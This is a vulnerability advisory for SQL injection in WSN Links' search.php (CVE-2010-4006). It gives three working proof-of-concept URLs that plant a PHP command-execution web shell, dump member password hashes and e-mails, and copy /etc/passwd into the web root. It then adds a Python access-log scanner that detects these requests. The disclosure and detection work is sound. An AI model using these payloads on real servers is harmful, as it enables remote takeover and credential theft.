WSN Links is an advanced PHP/MySQL-based search script. In WSN Links versions < 6.0.1, < 5.1.51, and < 5.0.81, the search.php file contains SQL injection vulnerabilities that could lead to sensitive information disclosure.
[+]info:
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - mark.stanislav@gmail.com
[+]poc:
A ‘UNION SELECT’ which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
A ‘UNION SELECT’ which results in a member’s name, password hash, and e-mail being extracted to a file
http://example.com/search.php?namecondition=IS NOT NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories
A ‘UNION SELECT’ which results in the /etc/passwd file being copied to a web directory file
http://example.com/search.php?namecondition=IS NOT NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories
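Added example (not part of the original advisory or of the WSN Links code): a web access-log check for the request shape used in the PoCs above, where the injected SQL sits in `namecondition` and the output file path in `namesearch`. The log lines, the `like` operator value and the operator allowlist pattern are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate *condition value is a short comparison operator.
OPERATOR = re.compile(r"[A-Za-z =<>!]{1,16}")
SQL_TOKENS = re.compile(r"\b(union|select|load_file|into\s+outfile)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

def inspect_target(target):
    """Return findings for one request target; an empty list means nothing suspicious."""
    parts = urlsplit(target)
    if not parts.path.endswith("/search.php"):
        return []
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    findings = []
    for name, value in params.items():
        if not name.endswith("condition"):
            continue
        if not OPERATOR.fullmatch(value):
            findings.append(f"{name}: not a plain operator")
        tokens = sorted({re.sub(r"\s+", " ", t.lower()) for t in SQL_TOKENS.findall(value)})
        if tokens:
            findings.append(f"{name}: SQL tokens {tokens}")
        # The PoCs end the condition with INTO OUTFILE and carry the path in *search.
        path = params.get(name[: -len("condition")] + "search", "")
        if "into outfile" in tokens and path:
            findings.append(f"check disk for written file: {path}")
    return findings

def scan_log(lines):
    """Return (client_ip, findings) for each log line that matches the injection shape."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and (found := inspect_target(m.group(1))):
            hits.append((line.split()[0], found))
    return hits

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Nov/2010:10:00:01 +0000] "GET /search.php?namecondition=like&namesearch=news&action=filter&filled=1&whichtype=categories HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Nov/2010:10:02:13 +0000] "GET /search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Nov/2010:10:03:40 +0000] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, found in scan_log(SAMPLE_LOG):
        print(ip, found)
```

A hit that reports a written file path gives responders a concrete artifact to look for on the web server, in addition to the source address.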
[+]Reference:
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/